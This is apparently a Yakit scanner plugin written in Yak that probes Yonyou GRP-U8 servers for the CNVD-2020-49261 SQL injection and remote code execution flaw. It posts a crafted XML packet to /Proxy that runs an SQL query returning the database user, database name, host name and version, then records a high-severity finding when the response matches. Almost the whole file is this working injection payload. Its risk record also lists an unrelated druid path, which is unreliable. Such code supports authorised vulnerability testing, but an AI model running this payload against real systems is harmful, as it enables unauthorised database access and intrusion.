# port scan plugin
yakit.AutoInitYakit()

// title="GRP-U8"
handleCheck = func(target,port, payload){
    addr = str.HostPort(target, port)
    isTls = str.IsTLSServer(addr)

    packet = `
POST /Proxy HTTP/1.1
Host: {{params(target)}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{{params(payload)}}`
    println(payload)
    rsp,req,_ = poc.HTTP(packet, 
    poc.params({"target":addr,"payload":payload}),
    poc.https(isTls),
    poc.redirectTimes(0),
    )

    if len(rsp) > 0 {
        println(string(rsp))
        if str.MatchAnyOfRegexp(rsp, `<ROW COLUMN1="(.*?)"`) && str.MatchAllOfSubString(rsp, `HTTP/1.1 200 OK`){
            yakit.Info("%v 用友GRP-U8_CNVD-2020-49261SQL注入&远程代码执行漏洞", addr)
            risk.NewRisk(
            addr,risk.title("用友GRP-U8_CNVD-2020-49261SQL注入&远程代码执行漏洞"),
            risk.severity("high"),
            risk.titleVerbose("用友GRP-U8_CNVD-2020-49261SQL注入&远程代码执行漏洞存在"),
            risk.type("RCE[用友GRP-U8]"),
            risk.payload(`/prod-api/druid/index.html`),
            risk.details({
                "req": string(req),
                "rsp": string(rsp),
            }),
        )
        }else{
            println("不存在用友GRP-U8_CNVD-2020-49261SQL注入&远程代码执行漏洞")
            }
       
    }

    return
}
handle = func(result /* *fp.MatchResult */) {
    // handle match result
    if !result.IsOpen(){
        return
    }
    payload = `cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>
<R9PACKET version="1">
<DATAFORMAT>XML</DATAFORMAT>
	<R9FUNCTION> 
		<NAME>AS_DataRequest</NAME>
		<PARAMS><PARAM> 
		<NAME>ProviderName</NAME>
		<DATA format="text">DataSetProviderData</DATA>
		</PARAM><PARAM> 
		<NAME>Data</NAME>
		<DATA format="text">select user,db_name(),host_name(),@@version</DATA>
		</PARAM></PARAMS> 
	</R9FUNCTION>
</R9PACKET>`

    if len(result.Fingerprint.HttpFlows)>0{
        handleCheck(result.Target,result.Port, payload)
    }
    
}